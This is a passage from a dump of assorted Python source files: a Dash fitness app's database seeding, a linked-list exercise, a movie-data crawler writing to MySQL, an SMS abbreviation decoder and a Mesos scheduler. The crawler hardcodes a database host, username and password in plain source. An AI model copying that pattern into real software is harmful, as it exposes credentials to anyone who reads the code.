eg\n # $ export FITLY_SETTINGS=/some/path/prod_settings.py\n server.config.from_envvar(\n \"FITLY_SETTINGS\", silent=True\n )\n\n return server\n\n\ndef create_dash(server):\n Base.metadata.create_all(bind=engine)\n\n \"\"\"Create the Dash instance for this application\"\"\"\n app = Dash(\n name=__package__,\n server=server,\n suppress_callback_exceptions=True,\n **get_dash_args_from_flask_config(server.config),\n )\n\n # Update the Flask config a default \"TITLE\" and then with any new Dash\n # configuration parameters that might have been updated so that we can\n # access Dash config easily from anywhere in the project with Flask's\n # 'current_app'\n server.config.setdefault(\"TITLE\", \"Dash\")\n server.config.update({key.upper(): val for key, val in app.config.items()})\n\n app.title = server.config[\"TITLE\"]\n\n app.session = scoped_session(SessionLocal)\n\n if \"SERVE_LOCALLY\" in server.config:\n app.scripts.config.serve_locally = server.config[\"SERVE_LOCALLY\"]\n app.css.config.serve_locally = server.config[\"SERVE_LOCALLY\"]\n\n return app\n\n\ndef db_startup(app):\n athlete_exists = True if len(app.session.query(athlete).all()) > 0 else False\n # If no athlete created in db, create one\n if not athlete_exists:\n dummy_athlete = athlete(\n min_non_warmup_workout_time=900,\n weekly_tss_goal=150,\n rr_max_goal=8,\n rr_min_goal=5,\n weekly_workout_goal=3,\n weekly_sleep_score_goal=3,\n weekly_readiness_score_goal=3,\n weekly_activity_score_goal=3,\n daily_sleep_hr_target=8,\n ftp_test_notification_week_threshold=6,\n cycle_power_zone_threshold_1=.55,\n cycle_power_zone_threshold_2=.75,\n cycle_power_zone_threshold_3=.9,\n cycle_power_zone_threshold_4=1.05,\n cycle_power_zone_threshold_5=1.2,\n cycle_power_zone_threshold_6=1.5,\n run_power_zone_threshold_1=0.8,\n run_power_zone_threshold_2=0.9,\n run_power_zone_threshold_3=1,\n run_power_zone_threshold_4=1.15,\n hr_zone_threshold_1=.6,\n hr_zone_threshold_2=.7,\n hr_zone_threshold_3=.8,\n hr_zone_threshold_4=.9,\n peloton_auto_bookmark_metric='readiness'\n )\n app.session.add(dummy_athlete)\n app.session.commit()\n\n db_refresh_record = True if len(app.session.query(dbRefreshStatus).all()) > 0 else False\n # Insert initial system load refresh record\n if not db_refresh_record:\n dummy_db_refresh_record = dbRefreshStatus(\n timestamp_utc=datetime.utcnow(),\n refresh_method='system',\n oura_status='System Startup',\n strava_status='System Startup',\n withings_status='System Startup',\n fitbod_status='System Startup')\n app.session.add(dummy_db_refresh_record)\n app.session.commit()\n\n # If fitbod_muslces table not populated create\n fitbod_muscles_table = True if len(app.session.query(fitbod_muscles).all()) > 0 else False\n if not fitbod_muscles_table:\n for exercise, muscle in [('Air Squats', 'Quadriceps'),\n ('Alternating Medicine Ball Push Up', 'Chest'),\n ('Alternating Single Arm Kettlebell Swing', 'Shoulders'),\n ('Arnold Dumbbell Press', 'Shoulders'),\n ('Assisted Chin Up', 'Back'),\n ('Back Extensions', 'Lower Back'),\n ('Back Squat', 'Quadriceps'),\n ('Barbell Bench Press', 'Chest'),\n ('Barbell Curl', 'Biceps'),\n ('Barbell Incline Bench Press', 'Chest'),\n ('Bench Dip', 'Triceps'),\n ('Bent Over Barbell Row', 'Back'),\n ('Biceps Curl To Shoulder Press', 'Biceps'),\n ('Bosu Ball Crunch', 'Abs'),\n ('Bosu Ball Mountain Climber', 'Abs'),\n ('Bosu Ball Push Up', 'Chest'),\n ('Bosu Ball Squat', 'Quadriceps'),\n ('Bulgarian Split Squat', 'Quadriceps'),\n ('Burpee', 'Quadriceps'),\n ('Cable Bicep Curl', 'Biceps'),\n ('Cable 
Crossover Fly', 'Chest'),\n ('Cable Crunch', 'Abs'),\n ('Cable Face Pull', 'Back'),\n ('Cable Lateral Raise', 'Shoulders'),\n ('Cable Rope Tricep Extension', 'Triceps'),\n ('Cable Row', 'Back'),\n ('Cable Russian Twists', 'Abs'),\n ('Cable Shoulder External Rotation', 'Shoulders'),\n ('Cable Shoulder External Rotation at 90', 'Shoulders'),\n ('Cable Tricep Pushdown', 'Triceps'),\n ('Cable Upright Row', 'Shoulders'),\n ('Cable Wood Chop', 'Abs'),\n ('Chin Up', 'Back'),\n ('Clean Deadlift', 'Hamstrings'),\n ('Close-Grip Bench Press', 'Triceps'),\n ('Concentration Curl', 'Biceps'),\n ('Crunches', 'Abs'),\n ('Curtsy Lunge', 'Hamstrings'),\n ('Dead Bug', 'Abs'),\n ('Deadlift', 'Lower Back'),\n ('Decline Crunch', 'Abs'),\n ('Decline Push Up', 'Chest'),\n ('Diamond Push Up', 'Chest'),\n ('Dip', 'Triceps'),\n ('Dumbbell Bench Press', 'Chest'),\n ('Dumbbell Bent Over Row', 'Back'),\n ('Dumbbell Bicep Curl', 'Biceps'),\n ('Dumbbell Clean', 'Hamstrings'),\n ('Dumbbell Decline Bench Press', 'Chest'),\n ('Dumbbell Decline Fly', 'Chest'),\n ('Dumbbell Floor Press', 'Chest'),\n ('Dumbbell Fly', 'Chest'),\n ('Dumbbell Front Raise', 'Shoulders'),\n ('Dumbbell Incline Bench Press', 'Chest'),\n ('Dumbbell Incline Fly', 'Chest'),\n ('Dumbbell Kickbacks', 'Triceps'),\n ('Dumbbell Lunge', 'Quadriceps'),\n ('Dumbbell No Money Curls', 'Biceps'),\n ('Dumbbell Pullover', 'Back'),\n ('Dumbbell Rear Delt Raise', 'Shoulders'),\n ('Dumbbell Romanian Deadlift', 'Lower Back'),\n ('Dumbbell Row', 'Back'),\n ('Dumbbell Shoulder Press', 'Shoulders'),\n ('Dumbbell Shoulder Raise', 'Shoulders'),\n ('Dumbbell Skullcrusher', 'Triceps'),\n ('Dumbbell Snatch', 'Hamstrings'),\n ('Dumbbell Squat', 'Quadriceps'),\n ('Dumbbell Squat To Shoulder Press', 'Quadriceps'),\n ('Dumbbell Step Up', 'Quadriceps'),\n ('Dumbbell Sumo Squat', 'Quadriceps'),\n ('Dumbbell Tricep Extension', 'Triceps'),\n ('Dumbbell Upright Row', 'Shoulders'),\n ('EZ-Bar Curl', 'Biceps'),\n ('Flutter Kicks', 'Abs'),\n ('Front Plate Raise', 'Shoulders'),\n ('Front Squat', 'Quadriceps'),\n ('Good Morning', 'Hamstrings'),\n ('Hack Squat', 'Quadriceps'),\n ('Hammer Curls', 'Biceps'),\n ('Hammerstrength Chest Press', 'Chest'),\n ('Hammerstrength Incline Chest Press', 'Chest'),\n ('Heel Press', ''),\n ('Incline Barbell Skull Crusher', 'Triceps'),\n ('Incline Dumbbell Curl', 'Biceps'),\n ('Incline Dumbbell Row', 'Back'),\n ('Incline Hammer Curl', 'Biceps'),\n ('Incline Push Up', 'Chest'),\n ('Incline Svend Press', 'Chest'),\n ('Iron Cross', 'Shoulders'),\n ('Jackknife Sit-Up', 'Abs'),\n ('Jump Squat', 'Quadriceps'),\n ('Kettlebell Front Squat', 'Quadriceps'),\n ('Kettlebell Sumo Squat', 'Quadriceps'),\n ('Kettlebell Swing', 'Hamstrings'),\n ('Kettlebell Upright Row', 'Shoulders'),\n ('Landmine Row', 'Back'),\n ('Landmine Squat to Press', 'Quadriceps'),\n ('Lat Pulldown', 'Back'),\n ('Lateral Cable Tricep Extension', 'Triceps'),\n ('Lateral Step Up', 'Hamstrings'),\n ('Lateral Step Up with Knee Drive', 'Hamstrings'),\n ('Leg Extension', 'Quadriceps'),\n ('Leg Press', 'Quadriceps'),\n ('Leg Pull-In', 'Abs'),\n ('Leg Raise', 'Abs'),\n ('Low Cable Chest Fly', 'Chest'),\n ('Lunge', 'Hamstrings'),\n ('Lunge Jump', 'Hamstrings'),\n ('Lunge with Ankle Grab', 'Hamstrings'),\n ('Machine Bench Press', 'Chest'),\n ('Machine Fly', 'Chest'),\n ('Machine Leg Press', 'Quadriceps'),\n ('Machine Preacher Curl', 'Biceps'),\n ('Machine Rear Delt Fly', 'Shoulders'),\n ('Machine Tricep Extension', 'Triceps'),\n ('Medicine Ball Push Up', 'Chest'),\n ('Medicine Ball Slam', 'Triceps'),\n ('Mixed 
Grip Pull Up', 'Back'),\n ('Mountain Climber', 'Abs'),\n ('Oblique Crunch', 'Abs'),\n ('Palms-Down Dumbbell Wrist Curl', 'Forearms'),\n ('Palms-Up Dumbbell Wrist Curl', 'Forearms'),\n ('Pike Push Up', 'Chest'),\n ('Plank', 'Abs'),\n ('Preacher Curl', 'Biceps'),\n ('Pull Up', 'Back'),\n ('Pulse Lunge', 'Hamstrings'),\n ('Push Press', 'Shoulders'),\n ('Push Up', 'Chest'),\n ('Push Up on Knees', 'Chest'),\n ('Rack Pulls', 'Lower Back'),\n ('Renegade Row', 'Back'),\n ('Reverse Barbell Curl', 'Biceps'),\n ('Reverse Crunch', 'Abs'),\n ('Reverse Grip Pull Down', 'Back'),\n ('Reverse Leg Crossover', 'Hamstrings'),\n ('Reverse Lunge', 'Hamstrings'),\n ('Romanian Deadlift', 'Hamstrings'),\n ('Rotation Push Up', 'Chest'),\n ('Russian Twist', 'Abs'),\n ('Scissor Crossover Kick', 'Abs'),\n ('Scissor Kick', 'Abs'),\n ('Seated Dumbbell Curl', 'Biceps'),\n ('Seated Dumbbell Rear Delt Raise', 'Shoulders'),\n ('Seated Leg Curl', 'Hamstrings'),\n ('Seated Tricep Press', 'Triceps'),\n ('Shotgun Row', 'Back'),\n ('Side Bridge', 'Abs'),\n ('Side Laterals to Front Raise', 'Shoulders'),\n ('Side Lunge', 'Quadriceps'),\n ('Single Arm Cable Bicep Curl', 'Biceps'),\n ('Single Arm Dumbbell Bench Press', 'Chest'),\n ('Single Arm Dumbbell Tricep Extension', 'Triceps'),\n ('Single Arm Landmine Press', 'Triceps'),\n ('Single Arm Landmine Row', 'Back'),\n ('Single Arm Lat Pulldown', 'Back'),\n ('Single Arm Overhead Press', 'Shoulders'),\n ('Single Arm Preacher Curl', 'Biceps'),\n ('Single Leg Kettlebell Deadlift', 'Lower Back'),\n ('Single Leg Romanian Deadlift', 'Lower Back'),\n ('Sit Up', 'Abs'),\n ('Skullcrusher', 'Triceps'),\n ('Smith Machine Bent Over Row', 'Back'),\n ('Smith Machine Squat', 'Quadriceps'),\n ('Smith Machine Stiff-Legged Deadlift', 'Lower Back'),\n ('Smith Machine Upright Row', 'Back'),\n ('Squat with Rotation', 'Quadriceps'),\n ('Standing Arnold Press', 'Shoulders'),\n ('Stiff-Legged Barbell Good Morning', 'Hamstrings'),\n ('Straight-Arm Pulldown', 'Back'),\n ('Superman', 'Lower Back'),\n ('Tate Press', 'Triceps'),\n ('T-Bar Row', 'Back'),\n ('Toe Touchers', 'Abs'),\n ('Tricep Overhead Extension with Rope', 'Triceps'),\n ('Tuck Jump', 'Abs'),\n ('Underhand Rear Delt Raise', 'Shoulders'),\n ('Upright Row', 'Back'),\n ('V-Bar Pulldown', 'Back'),\n ('Walking Lunge', 'Quadriceps'),\n ('Wall Sit', 'Abs'),\n ('Weighted Ball Hyperextension', 'Lower Back'),\n ('Weighted Wall Sit', 'Abs'),\n ('Wide Grip Lat Pulldown', 'Back'),\n ('Zottman Curl', 'Biceps'),\n ('Zottman Preacher Curl', 'Biceps')]:\n app.session.add(fitbod_muscles(exercise=exercise, muscle=muscle))\n app.session.commit()\n app.session.remove()\n","sub_path":"src/fitly/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"457980819","text":"class LinkedList:\n class Node:\n next = None\n item = None\n def __init__(self, d):\n self.item = d\n \n root = None\n \n def __init__(self, *items):\n self.addAll(*items)\n \n def add(self, item):\n #No elements in LinkedList\n if self.root is None:\n self.root = LinkedList.Node(item)\n return\n \n next = self.root\n while next.next is not None:\n next = next.next\n \n next.next = LinkedList.Node(item)\n \n def addAll(self, *items):\n for i in range(len(items)):\n self.add(items[i])\n \n def remove(self, item):\n assert(self.root is not None)\n curr = self.root\n prev = None\n while curr.item is not item:\n prev = curr\n curr = prev.next\n \n #First node\n if prev is None:\n 
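# the match is at the head, so re-point root past it; the old node is garbage-collected once unreferenced\n            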
self.root = self.root.next\n else: \n prev.next = curr.next\n \n def traverse(self):\n if self.root is None:\n return []\n curr = self.root\n traversal = [curr.item]\n while curr.next is not None:\n curr = curr.next\n traversal.append(curr.item) \n #print(traversal)\n return traversal\n \n def reverse(self):\n if self.root is None:\n return\n curr = self.root\n self.root = None\n while curr is not None:\n #Store next node\n temp = curr.next\n #Point current node to previous node (Reverse)\n curr.next = self.root\n #Store curr node as previous node(head of list)\n self.root = curr\n #Go to next node\n curr = temp\n \n def nodeAt(self, i):\n if i < 1 or self.root is None:\n return None\n \n nd = self.root\n while nd.next is not None and i > 1:\n nd = nd.next\n i = i-1\n \n if i > 1:\n return None\n return nd\n \ndef deleteDuplicateSet(ll):\n if ll.root is None:\n return\n data_set = {}\n curr = ll.root\n prev = None\n while curr is not None:\n try:\n data_set[curr.item]\n prev.next = curr.next\n except KeyError:\n data_set[curr.item] = ''\n prev = curr\n finally:\n curr = curr.next\n \ndef checkPalindrome(ll):\n if ll.root is None:\n return False\n \n slow = ll.root\n fast = ll.root\n stack = []\n while fast is not None and fast.next is not None:\n stack.append(slow.item)\n fast = fast.next.next\n slow = slow.next\n #print(stack)\n \n #odd list\n if fast is not None:\n slow = slow.next\n \n while slow is not None:\n if slow.item == stack.pop():\n slow = slow.next\n else:\n return False\n return True\n \ndef intersection(ll1, ll2):\n assert(ll1.root is not None and ll2.root is not None)\n curr1 = ll1.root\n curr2 = ll2.root\n l1 = 1\n l2 = 1\n while curr1.next is not None:\n l1 += 1\n curr1 = curr1.next\n \n while curr2.next is not None:\n l2 += 1\n curr2 = curr2.next\n\n #No intersection if last node is not same\n if not curr1 == curr2:\n return 0\n \n if l1 > l2:\n k = l1 - l2\n longer = ll1.root\n shorter = ll2.root\n else:\n k = l2 - l1\n longer = ll2.root\n shorter = ll1.root\n \n while k > 0:\n longer = longer.next\n k = k-1\n \n i=0\n while longer != shorter and shorter is not None:\n longer = longer.next\n shorter = shorter.next\n i += 1\n \n return i+1\n \n \ndef joinLinkedList(ll1, ll2, k):\n #Joins end of ll1 to ll2 at k position\n joined = LinkedList(*ll1.traverse())\n end1 = joined.root\n while end1.next is not None:\n end1 = end1.next\n \n i = 1\n i_pt = ll2.root\n while i != k:\n i += 1\n i_pt = i_pt.next\n \n end1.next = i_pt\n return joined\n \ndef detectLoop(ll):\n #Fast and slow pointer can detect loop\n fast = ll.root\n slow = ll.root\n while fast is not None and fast.next is not None:\n fast = fast.next.next\n slow = slow.next \n if fast == slow:\n break\n \n if fast is None or fast.next is None:\n return None\n \n slow = ll.root\n while fast is not None:\n if fast == slow:\n return fast\n fast = fast.next\n slow = slow.next \n \n return None\n \n \ndef testLinkedList():\n ll = LinkedList(1) \n assert(ll.traverse()==[1])\n ll.remove(1)\n assert(ll.traverse()==[])\n try:\n ll.remove(1)\n raise Exception(\"Error in remove\")\n except AssertionError:\n pass\n ll.add(2)\n ll.add(3)\n assert(ll.traverse() == [2,3])\n ll.remove(2)\n assert(ll.traverse()==[3])\n ll.add(4)\n ll.add(1)\n assert(ll.traverse()==[3,4,1])\n ll.remove(1)\n ll.remove(4)\n assert(ll.traverse()==[3])\n ll.addAll(1,2,3,4,5,6,4,3,2,5,6)\n assert(ll.traverse()==[3,1,2,3,4,5,6,4,3,2,5,6])\n ll_list = ll.traverse()\n ll_list.reverse()\n ll.reverse()\n assert(ll.traverse()==ll_list)\n ll.reverse()\n 
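# reverse both copies back and confirm the list round-trips to its original order\n    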
ll_list.reverse()\n    assert(ll.traverse()==ll_list)\n    deleteDuplicateSet(ll)\n    assert(ll.traverse()==[3,1,2,4,5,6])\n    ll2 = LinkedList(1,2,3,2,1)\n    assert(checkPalindrome(ll2)==True)\n    ll2 = LinkedList(1,2,2,1)\n    assert(checkPalindrome(ll2)==True)\n    ll2 = LinkedList(1,2,3,3,2,1)\n    assert(checkPalindrome(ll2)==True)\n    ll2 = LinkedList(1,2,3,3,4,1)\n    assert(checkPalindrome(ll2)==False)\n    ll2 = LinkedList(1,2,3,2,3)\n    assert(checkPalindrome(ll2)==False)\n    ll1 = LinkedList(1,2,3,4,5)\n    ll2 = LinkedList(21,22,23,24,25)\n    assert(intersection(ll1, ll2) == 0)\n    joined = joinLinkedList(ll1, ll2, 4)\n    assert(joined.traverse() == [1,2,3,4,5,24,25])\n    assert(intersection(joined, ll2) == 4)\n    joined = joinLinkedList(ll2, ll1, 5)\n    assert(joined.traverse() == [21,22,23,24,25,5])\n    assert(intersection(joined, ll2) == 0)\n    assert(intersection(joined, ll1) == 5)\n    \n    assert(detectLoop(ll1) == None)\n    assert(detectLoop(LinkedList()) == None)\n    assert(detectLoop(LinkedList(1)) == None)\n    assert(detectLoop(LinkedList(1, 2)) == None)\n    lll = LinkedList(*ll1.traverse())\n    #1->2->3->4->5->1\n    lll.nodeAt(5).next = lll.root\n    assert(detectLoop(lll).item == 1)\n    \n    #1->2->3->4->5->2\n    lll.nodeAt(5).next = lll.nodeAt(2)\n    assert(detectLoop(lll).item == 2)\n    \n    #1->2->3->4->5->3\n    lll.nodeAt(5).next = lll.nodeAt(3)\n    assert(detectLoop(lll).item == 3)\n    \n    #1->2->3->4->5->4\n    lll.nodeAt(5).next = lll.nodeAt(4)\n    assert(detectLoop(lll).item == 4)\n    \n    #1->2->3->4->5->5\n    lll.nodeAt(5).next = lll.nodeAt(5)\n    assert(detectLoop(lll).item == 5)\n    \ntestLinkedList() ","sub_path":"2linkedlist.py","file_name":"2linkedlist.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"51268017","text":"#### contents and production_countrys tables\nimport requests\nimport json\nimport datetime\nimport pymysql\nimport time\n\n\nconn = pymysql.connect(host='18.188.140.138', user='user01', password='1111', db='movies_db', charset='utf8') # was commented out, but the cursor below needs it\ncursor = conn.cursor()\n\nsql = \"SELECT content_id, title FROM contents\"\n\ncursor.execute(sql)\nmc = cursor.fetchall() # load content_id, title from the contents table\n\nsql = \"SELECT * FROM production_countrys\"\n\ncursor.execute(sql)\nc_table = cursor.fetchall() # load the country table\n\n\nfor i in range(len(mc)):\n    movieCd = str(mc[i][0]) # convert to a string for the query\n\n    # crawl movie details by movie code (KOFIC open API); mykey must hold the API key\n    url = 'http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieInfo.json?key='+mykey+'&movieCd='+movieCd\n\n    #time.sleep(3) # 3 seconds\n    req = requests.get(url)\n    text = req.text\n\n    d = json.loads(text)\n\n    b=d['movieInfoResult']['movieInfo'] # b = the movie's detailed info\n    #print(b)\n    print(b['movieNm'])\n    \n    # country info (insert each country as its own row into content_country, not as one concatenated string)\n    for j in b['nations']: # j = one country entry for the movie\n        nation = j['nationNm']\n        check = 0\n        for k in range(len(c_table)): # map the country name to its code (k, so the outer j is not shadowed)\n            if nation == c_table[k][1]:\n                nation_code = c_table[k][0]\n                check = 1\n                break\n        if check == 0: # countries missing from the table are stored as other ('ee')\n            nation_code = 'ee'\n        #print('before: '+nation+' after: '+nation_code)\n        l = [mc[i][0], nation_code]\n        sql = \"INSERT INTO content_country (content_pid, nation_code) VALUES (%s, %s)\"\n        try:\n            cursor.execute(sql,l)\n        except:\n            print('insert failed')\n            pass\n    \nconn.commit()\nconn.close()","sub_path":"code/movie data/content_country.py","file_name":"content_country.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"482119454","text":"#Sample code for SMS translator\r\n
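# expands texting abbreviations into full phrases via the parallel abr/longAbr lists below\r\n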
import re, string\r\ndef chatDecoder():\r\n    abr=['b1','141','AA','AAK','AAF','A3','LOL','IAAG','FR']\r\n    longAbr=['be one','one for all and all for one','Ask about','Alive and kicking/Asleep at keyboard','As a friend/As a matter of fact','Anytime, Anywhere, Anyplace',\\\r\n             'laugh out loud','i am a Genius','for real']\r\n    message=input(\"What message do you want decoded? \\n\")\r\n    translator = str.maketrans({key: None for key in string.punctuation})\r\n    message=message.translate(translator)\r\n    messageToList=message.split() # changes a sentence into loopable elements.\r\n    \r\n    for i in messageToList:\r\n        modifiedMessage=\"\"\r\n        for j in abr:\r\n            # plain case-insensitive comparison; re.fullmatch treated the user's word as a regex\r\n            if i.lower() == j.lower():\r\n                i=longAbr[abr.index(j)] \r\n                # here italicize i\r\n                break\r\n        modifiedMessage+=i  # append once per word, outside the abbreviation loop\r\n        modifiedMessage=modifiedMessage.lower()\r\n        print(modifiedMessage, end=\" \") # The end=\" \", prints the output horizontally\r\n    print(\".\")\r\n    return\r\n\r\nchatDecoder()\r\n","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"379191506","text":"from collections import defaultdict\nfrom getpass import getuser\nimport functools\nimport logging\nimport threading\nimport socket\nimport sys\n\nfrom .detector import StandaloneMasterDetector\nfrom .util import camel_call, timed, unique_suffix\nfrom .vendor import mesos\n\nfrom compactor.context import Context\nfrom compactor.pid import PID\nfrom compactor.process import ProtobufProcess\nfrom mesos.interface import SchedulerDriver\n\nlog = logging.getLogger(__name__)\n\n\nclass SchedulerProcess(ProtobufProcess):\n  def __init__(self, driver, scheduler, framework, credential=None, detector=None):\n    self.driver = driver\n    self.scheduler = scheduler\n    self.framework = framework\n    self.master = None\n\n    # events\n    self.connected = threading.Event()\n    self.aborted = threading.Event()\n    self.failover = threading.Event()\n\n    # credentials\n    self.credential = credential\n    self.authenticating = threading.Event()\n    self.authenticated = threading.Event()\n\n    # master detection\n    self.detector = detector\n\n    # saved state\n    self.saved_offers = defaultdict(dict)\n    self.saved_slaves = {}\n\n    super(SchedulerProcess, self).__init__(unique_suffix('scheduler'))\n\n  def initialize(self):\n    super(SchedulerProcess, self).initialize()\n    self.detector.detect(previous=self.master).add_done_callback(self.detected)\n\n  def ignore_if_aborted(method):\n    @functools.wraps(method)\n    def _wrapper(self, from_pid, *args, **kwargs):\n      if self.aborted.is_set():\n        log.info('Ignoring message from %s because the scheduler driver is aborted.' % from_pid)\n        return\n      return method(self, from_pid, *args, **kwargs)\n    return _wrapper\n\n  def ignore_if_disconnected(method):\n    @functools.wraps(method)\n    def _wrapper(self, *args, **kwargs):\n      if not self.connected.is_set():\n        log.info('Ignoring message because the scheduler driver is disconnected.')\n        return\n      return method(self, *args, **kwargs)\n    return _wrapper\n\n  def valid_origin(self, from_pid):\n    if self.master != from_pid:\n      log.warning('Ignoring message from non-leading master %s' % from_pid)\n      return False\n    return True\n\n  @ignore_if_aborted\n  def detected(self, master_future):\n    try:\n      master_uri = master_future.result()\n    except Exception as e:\n      log.fatal('Failed to detect master: %s' % e)\n      # TODO(wickman) Are we on MainThread? 
If not, this might not actually terminate anything\n # but this thread.\n sys.exit(1)\n\n if self.connected.is_set():\n self.connected.clear()\n with timed(log.debug, 'scheduler::disconnected'):\n camel_call(self.scheduler, 'disconnected', self.driver)\n\n # TODO(wickman) Implement authentication.\n if master_uri:\n log.info('New master detected: %s' % master_uri)\n self.master = PID.from_string(\"master@%s\" % master_uri)\n self.link(self.master)\n else:\n self.master = None\n\n self.__maybe_register()\n\n # TODO(wickman) Detectors should likely operate on PIDs and not URIs.\n self.detector.detect(previous=master_uri).add_done_callback(self.detected)\n\n # TODO(wickman) Implement reliable registration -- i.e. __maybe_register() should operate\n # in a loop until self.connected.is_set().\n def __maybe_register(self):\n if self.connected.is_set() or self.master is None:\n return\n\n # We have never registered before\n if not self.framework.id.value:\n message = mesos.internal.RegisterFrameworkMessage(framework=self.framework)\n log.info('Registering framework: %s' % message)\n else:\n message = mesos.internal.ReregisterFrameworkMessage(\n framework=self.framework, failover=self.failover.is_set())\n log.info('Reregistering framework: %s' % message)\n\n self.send(self.master, message)\n\n @ProtobufProcess.install(mesos.internal.FrameworkRegisteredMessage)\n @ignore_if_aborted\n def registered(self, from_pid, message):\n if self.connected.is_set():\n log.info('Ignoring registered message as we are already connected.')\n return\n if not self.valid_origin(from_pid):\n return\n self.framework.id.value = message.framework_id.value\n self.connected.set()\n self.failover.clear()\n\n with timed(log.debug, 'scheduler::registered'):\n camel_call(self.scheduler, 'registered',\n self.driver, message.framework_id, message.master_info)\n\n @ProtobufProcess.install(mesos.internal.FrameworkReregisteredMessage)\n @ignore_if_aborted\n def reregistered(self, from_pid, message):\n if self.connected.is_set():\n log.info('Ignoring registered message as we are already connected.')\n return\n if not self.valid_origin(from_pid):\n return\n assert self.framework.id == message.framework_id\n self.connected.set()\n self.failover.clear()\n\n with timed(log.debug, 'scheduler::reregistered'):\n camel_call(self.scheduler, 'reregistered', self.driver, message.master_info)\n\n @ProtobufProcess.install(mesos.internal.ResourceOffersMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def resource_offers(self, from_pid, message):\n assert self.master is not None\n if not self.valid_origin(from_pid):\n return\n for offer, pid in zip(message.offers, message.pids):\n offer_id = offer.id.value\n slave_id = offer.slave_id.value\n self.saved_offers[offer_id][slave_id] = PID.from_string(pid)\n with timed(log.debug, 'scheduler::resource_offers'):\n camel_call(self.scheduler, 'resource_offers', self.driver, message.offers)\n\n @ProtobufProcess.install(mesos.internal.RescindResourceOfferMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def rescind_offer(self, from_pid, message):\n assert self.master is not None\n if not self.valid_origin(from_pid):\n return\n log.info('Rescinding offer %s' % message.offer_id.value)\n if not self.saved_offers.pop(message.offer_id.value, None):\n log.warning('Offer %s not found.' 
% message.offer_id.value)\n with timed(log.debug, 'scheduler::offer_rescinded'):\n camel_call(self.scheduler, 'offer_rescinded', self.driver, message.offer_id)\n\n @ProtobufProcess.install(mesos.internal.StatusUpdateMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def status_update(self, from_pid, message):\n if not self.valid_origin(from_pid):\n return\n if message.pid:\n sender_pid = PID.from_string(message.pid)\n self.status_update_acknowledgement(message.update, sender_pid)\n with timed(log.debug, 'scheduler::status_update'):\n camel_call(self.scheduler, 'status_update', self.driver, message.update.status)\n\n @ignore_if_aborted\n def status_update_acknowledgement(self, update, pid):\n message = mesos.internal.StatusUpdateAcknowledgementMessage(\n framework_id=self.framework.id,\n slave_id=update.slave_id,\n task_id=update.status.task_id,\n uuid=update.uuid,\n )\n self.send(pid, message)\n\n @ProtobufProcess.install(mesos.internal.LostSlaveMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def lost_slave(self, from_pid, message):\n assert self.master is not None\n if not self.valid_origin(from_pid):\n return\n self.slave_pids.pop(message.slave_id)\n with timed(log.debug, 'scheduler::slave_lost'):\n camel_call(self.scheduler, 'slave_lost', self.driver, message.slave_id)\n\n @ProtobufProcess.install(mesos.internal.ExecutorToFrameworkMessage)\n @ignore_if_aborted\n def framework_message(self, from_pid, message):\n with timed(log.debug, 'scheduler::framework_message'):\n camel_call(self.scheduler, 'framework_message',\n self.driver,\n message.executor_id,\n message.slave_id,\n message.data\n )\n\n @ProtobufProcess.install(mesos.internal.FrameworkErrorMessage)\n @ignore_if_aborted\n def error(self, from_pid, message):\n with timed(log.debug, 'scheduler::error'):\n camel_call(self.scheduler, 'error', self.driver, message.message)\n\n @ignore_if_aborted\n def stop(self, failover=False):\n if not failover:\n self.connected.clear()\n self.failover.set()\n self.send(self.master, mesos.internal.UnregisterFrameworkMessage(\n framework_id=self.framework.id\n ))\n\n @ignore_if_aborted\n def abort(self):\n self.connected.clear()\n self.aborted.set()\n\n @ignore_if_disconnected\n def kill_task(self, task_id):\n assert self.master is not None\n message = mesos.internal.KillTaskMessage(framework_id=self.framework.id, task_id=task_id)\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def request_resources(self, requests):\n assert self.master is not None\n message = mesos.internal.ResourceRequestMessage(\n framework_id=self.framework.id,\n requests=requests,\n )\n self.send(self.master, message)\n\n def launch_tasks(self, offer_ids, tasks, filters=None):\n # TODO(tarnfeld): Implement this, we need to tell the framework that the\n # tasks were lost.\n def task_lost(task):\n pass\n\n if not isinstance(offer_ids, list):\n offer_ids = [offer_ids]\n\n assert len(offer_ids) > 0\n\n if filters is None:\n filters = mesos.Filters()\n\n lost_tasks = False\n\n # Perform some sanity checking on the tasks before launching them\n for task in tasks:\n if not self.connected.is_set():\n task_lost(task)\n lost_tasks = True\n continue\n if task.HasField('executor') == task.HasField('command'):\n log.error('A task must have either an executor or command')\n task_lost(task)\n lost_tasks = True\n continue\n if task.HasField('executor') and task.executor.HasField('framework_id') \\\n and task.executor.framework_id.value != self.framework.id.value:\n log.error('Executor has an invalid framework 
ID')\n task_lost(task)\n lost_tasks = True\n continue\n if task.HasField('executor') and not task.executor.HasField('framework_id'):\n task.executor.framework_id.value = self.framework.id.value\n\n if lost_tasks:\n return\n\n message = mesos.internal.LaunchTasksMessage(\n framework_id=self.framework.id,\n tasks=tasks,\n filters=filters,\n )\n\n for offer_id in offer_ids:\n field = message.offer_ids.add()\n field.value = offer_id.value\n\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def revive_offers(self):\n assert self.master is not None\n message = mesos.internal.ReviveOffersMessage(framework_id=self.framework.id)\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def send_framework_message(self, executor_id, slave_id, data):\n assert executor_id is not None\n assert slave_id is not None\n assert data is not None\n message = mesos.internal.FrameworkToExecutorMessage(\n framework_id=self.framework.id,\n executor_id=executor_id,\n slave_id=slave_id,\n data=data,\n )\n self.send(self.master, message)\n\n @ignore_if_disconnected\n def reconcile_tasks(self, statuses):\n assert self.master is not None\n message = mesos.internal.ReviveOffersMessage(framework_id=self.framework.id, statuses=statuses)\n self.send(self.master, message)\n\n del 